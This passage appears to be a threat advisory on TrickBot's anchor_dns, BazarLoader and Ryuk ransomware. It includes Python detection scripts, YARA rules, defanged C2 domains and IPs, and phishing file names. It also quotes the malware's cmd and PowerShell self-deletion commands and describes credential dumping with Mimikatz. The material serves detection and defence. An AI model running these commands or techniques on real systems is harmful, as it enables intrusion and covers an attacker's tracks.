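    qname = qname.rstrip(".").lower()
    suffix = "." + zone
    if not qname.endswith(suffix):
        return None
    hexed = qname[: -len(suffix)].replace(".", "")
    try:
        return bytes.fromhex(hexed)  # assumption: labels carry hex digits
    except ValueError:
        return None


def find_key(payload):
    """Try the reported key first, then every other single-byte key."""
    for key in [KNOWN_KEY] + [k for k in range(256) if k != KNOWN_KEY]:
        if MARKER in xor_bytes(payload, key):
            return key
    return None


def inspect_query(qname, zone=ZONE):
    """Return a finding dict if the query decodes to anchor_dns traffic."""
    payload = payload_from_qname(qname, zone)
    if not payload:
        return None
    key = find_key(payload)
    if key is None:
        return None
    finding = {"qname": qname, "key": key}
    match = GUID_RE.search(xor_bytes(payload, key))
    if match:
        finding.update(
            {name: value.decode("ascii", "replace")
             for name, value in match.groupdict().items()}
        )
    return finding


if __name__ == "__main__":
    queries = [
        make_sample_qname(SAMPLE_PLAINTEXT, KNOWN_KEY),  # reported key
        make_sample_qname(SAMPLE_PLAINTEXT, 0x5A),       # different key
        "www.c2.example",                                # ordinary lookup
    ]
    for q in queries:
        print(q[:40] + "...", "->", inspect_query(q))
```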

<p>The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.</p>

<p><code>[random_folder_name_in_%APPDATA%_excluding_Microsoft]</code></p>

<p><code>autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)</code>.</p>
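
<p>The file and task naming conventions above can be turned into a host triage check. The following Python code is an added example, not code from the advisory: it takes a file listing (the paths here are constructed) and flags directories whose <code>Modules</code> subdirectory holds the listed module names with a 32/64 suffix, using the ID files only as corroboration because names such as <code>data</code> and <code>Readme.md</code> are common on clean hosts. The function names and verdict labels are assumptions of this example.</p>

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Module names and per-module config files as listed in the advisory (compared lowercase).
MODULES = {"systeminfo", "importdll", "outlookdll", "injectdll", "mailsearcher",
           "networkdll", "wormdll", "tabdll", "sharedll"}
CONFIGS = {"injectdll": {"dinj", "sinj", "dpost"},
           "mailsearcher": {"mailconf"},
           "networkdll": {"dpost"}}
# Bot-ID, campaign-ID and diagnostic files. These only corroborate a Modules hit;
# they never raise a finding on their own.
ID_FILES = {"client_id", "data", "faq", "group_tag", "readme.md", "anchordiag.txt"}

# <module name><32|64>, optionally followed by "_configs" for the config directory.
ENTRY_RE = re.compile(r"^(?P<name>[A-Za-z]+?)(?P<arch>32|64)(?P<cfg>_configs)?$")
# Scheduled-task name: "autoupdate#" followed by exactly five digits.
TASK_RE = re.compile(r"(?:^|\\)autoupdate#\d{5}$")


def is_trickbot_task_name(task_name):
    """True when a task name (with or without a folder prefix) fits the convention."""
    return TASK_RE.search(task_name) is not None


def triage(paths):
    """Group file paths by candidate malware directory and grade each directory."""
    found = defaultdict(lambda: {"modules": set(), "configs": set()})
    id_files = defaultdict(set)
    for raw in paths:
        p = PureWindowsPath(raw)
        parts = p.parts
        idx = next((i for i, part in enumerate(parts) if part.lower() == "modules"), None)
        if idx is None:
            # Not under a Modules directory: remember ID files for later corroboration.
            if p.name.lower() in ID_FILES:
                id_files[str(p.parent).lower()].add(p.name)
            continue
        rest = parts[idx + 1:]
        if idx == 0 or not rest:
            continue
        m = ENTRY_RE.match(rest[0])
        if not m or m["name"].lower() not in MODULES:
            continue  # a Modules directory that belongs to something else
        root = str(PureWindowsPath(*parts[:idx]))
        if len(rest) == 1 and not m["cfg"]:
            found[root]["modules"].add(rest[0])
        elif (len(rest) == 2 and m["cfg"]
              and rest[1].lower() in CONFIGS.get(m["name"].lower(), ())):
            found[root]["configs"].add(f"{rest[0]}/{rest[1]}")

    report = {}
    for root, hit in found.items():
        ids = id_files.get(root.lower(), set())
        strong = bool(hit["modules"]) and bool(hit["configs"] or ids)
        report[root] = {**hit, "id_files": ids,
                        "verdict": "likely" if strong else "possible"}
    return report


# CONSTRUCTED listing: one directory that follows the layout, two that do not.
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\winapp\Modules\importDll64",
    r"C:\Users\alice\AppData\Roaming\winapp\Modules\injectDll64",
    r"C:\Users\alice\AppData\Roaming\winapp\Modules\injectDll64_configs\dinj",
    r"C:\Users\alice\AppData\Roaming\winapp\client_id",
    r"C:\Users\alice\AppData\Roaming\winapp\group_tag",
    r"C:\Users\bob\AppData\Roaming\SomeApp\Readme.md",   # common name, no Modules
    r"C:\Users\bob\AppData\Roaming\SomeApp\data",
    r"C:\ProgramData\Vendor\Modules\render64",           # Modules, unknown module
]

if __name__ == "__main__":
    for root, info in triage(SAMPLE_PATHS).items():
        print(info["verdict"], root, sorted(info["modules"]), sorted(info["configs"]))
```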

<p>After successful execution, <code>anchor_dns</code> further deploys malicious batch scripts (<code>.bat</code>) using PowerShell commands.</p>

<p>The malware deploys self-deletion techniques by executing the following commands.</p>

<ul>
<li><code>cmd.exe /c timeout 3 &amp;&amp; del C:\Users\[username]\[malware_sample]</code></li>
<li><code>cmd.exe /C PowerShell "Start-Sleep 3; Remove-Item C:\Users\[username]\[malware_sample_location]"</code></li>
</ul>

<p>The following domains found in outbound DNS records are associated with <code>anchor_dns</code>.</p>

<ul>
<li><code>kostunivo[.]com</code></li>
<li><code>chishir[.]com</code></li>
<li><code>mangoclone[.]com</code></li>
<li><code>onixcellent[.]com</code></li>
</ul>

<p>This malware used the following legitimate domains to test internet connectivity.</p>

<ul>
<li><code>ipecho[.]net</code></li>
<li><code>api[.]ipify[.]org</code></li>
<li><code>checkip[.]amazonaws[.]com</code></li>
<li><code>ip[.]anysrc[.]net</code></li>
<li><code>wtfismyip[.]com</code></li>
<li><code>ipinfo[.]io</code></li>
<li><code>icanhazip[.]com</code></li>
<li><code>myexternalip[.]com</code></li>
<li><code>ident[.]me</code></li>
</ul>

<p>Currently, there is an open-source tracker for TrickBot C2 servers located at <a href=”https://feodotracker.abuse.ch/browse/trickbot/”>https://feodotracker.abuse.ch/browse/trickbot/</a>.</p>

<p>The <code>anchor_dns</code> malware historically used the following C2 servers.</p>

<ul>
<li><code>23[.]95[.]97[.]59</code></li>
<li><code>51[.]254[.]25[.]115</code></li>
<li><code>193[.]183[.]98[.]66</code></li>
<li><code>91[.]217[.]137[.]37</code></li>
<li><code>87[.]98[.]175[.]85</code></li>
</ul>

<h4>TrickBot YARA Rules</h4>

<div class=”special_container”>rule anchor_dns_strings_filenames {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off strings or filenames used in malware"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "fc0efd612ad528795472e99cae5944b68b8e26dc"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "794eb3a9ce8b7e5092bb1b93341a54097f5b78a9"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = "9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = "24d4bbc982a6a561f0426a683b9617de1a96a74a"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ",Control_RunDLL \x00"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":$GUID" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":$DATA" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "/1001/"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(\x00|\xCC)qwertyuiopasdfghjklzxcvbnm(\x00|\xCC)/<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(\x00|\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\x00|\xCC)/<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "start program with cmdline \"%s\""<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Global\\fde345tyhoVGYHUJKIOuy"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "ChardWorker::thExecute: error registry me"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "get command: incode %s, cmdid \"%s\", cmd \"%s\""<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "anchorDNS"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Anchor_x86"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Anchor_x64"<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_icmp_transport {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off ICMP transport strings"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "reset_connection &lt;- %s"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "server_ok &lt;- %s (packets on server %s)"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "erase successfully transmitted packet (count: %d)"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Packet sended with crc %s -&gt; %s"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "send data confimation to server(%s)"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "data recived from &lt;- %s"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Rearmost packed recived (id: %s)"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "send poll to server -&gt; : %s"<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_config_dexor {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "d0278ec015e10ada000915a1943ddbb3a0b6b3db"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_installer {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "fa98074dc18ad7e2d357b5d168c00a91256d87d1"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "78f0737d2b1e605aad62af252b246ef390521f02"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 72 B8}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (&nbsp;&nbsp; uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\2)) == 0x5A4D<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 or $deob_x64<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br />
}</div>

<div class=”special_container”>import "pe"<br />
rule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "ff8237252d53200c132dd742edc77a6c67565eee"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "c8299aadf886da55cb47e5cbafe8c5a482b47fc8"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $str1001 = {2F 31 30 30 31 2F 00} // /1001/<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip1 = "checkip.amazonaws.com" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip2 = "ipecho.net" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip3 = "ipinfo.io" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip4 = "api.ipify.org" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip5 = "icanhazip.com" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip6 = "myexternalip.com" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip7 = "wtfismyip.com" ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip8 = "ip.anysrc.net" ascii wide<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and $str1001<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and (<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for any i in (0..pe.number_of_sections): (<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pe.sections[i].name == ".addr"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6 of ($ip*)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br />
}</div>

<div class=”special_container”>rule anchor_dns_check_random_string_in_dns_response {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off checking random string in DNS response"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "14e9d68bba7a184863667c680a8d5a757149aa36"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_default_result_execute_command {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off default result value and executing command"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "14e9d68bba7a184863667c680a8d5a757149aa36"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_pdbs {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off partial PDB paths"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "f0e575475f33600aede6a1b9a5c14f671cb93b7b"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "1304372bd4cdd877778621aea715f45face93d68"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = "e5dc7c8bfa285b61dda1618f0ade9c256be75d1a"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = "f96613ac6687f5dbbed13c727fa5d427e94d6128"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash5 = "46750d34a3a11dd16727dc622d127717beda4fa2"<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\MyProjects\\secondWork\\Anchor\\"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\simsim\\anchorDNS"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\[JOB]\\Anchor\\"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\Anchor\\Win32\\Release\\Anchor_"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\Users\\ProFi\\Desktop\\data\\Win32\\anchor"<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<h4>BazarLoader/BazarBackdoor</h4>

<p>Beginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.</p>

<p>BazarLoader is typically deployed through phishing emails with the following characteristics:</p>

<ul>
<li>Phishing emails are typically delivered by commercial mass email delivery services. Email received by a victim will contain a link to an actor-controlled Google Drive document or another free online file-hosting solution, typically purporting to be a PDF file.</li>
<li>This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple-extension file.</li>
<li>Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decisions, or other important tasks that require the attention of the recipient.</li>
<li>Some email communications have included the recipient’s name or employer name in the subject line and/or email body.</li>
</ul>

<p>Through phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:</p>

<ul>
<li><code>Report-Review26-10.exe</code></li>
<li><code>Review_Report15-10.exe</code></li>
<li><code>Document_Print.exe</code></li>
<li><code>Report10-13.exe</code></li>
<li><code>Text_Report.exe</code></li>
</ul>

<p>Bazar activity can be identified by searching the system startup folders and Userinit values under the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</code> registry key:</p>

<p><code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk</code></p>

<p>For a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <a href=”https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html”>https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html</a>.</p>

<h4>Indicators</h4>

<p>In addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. The following C2 servers are known to be associated with this malicious activity.</p>


<h4>Ryuk Ransomware</h4>

<p>Typically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the <a href=”https://www.ncsc.gov.uk/news/ryuk-advisory”>United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally</a>, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the <code>HERMES</code> tag but, in some infections, the files have <code>.ryk</code> added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.</p>

<p>While negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject a malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.</p>

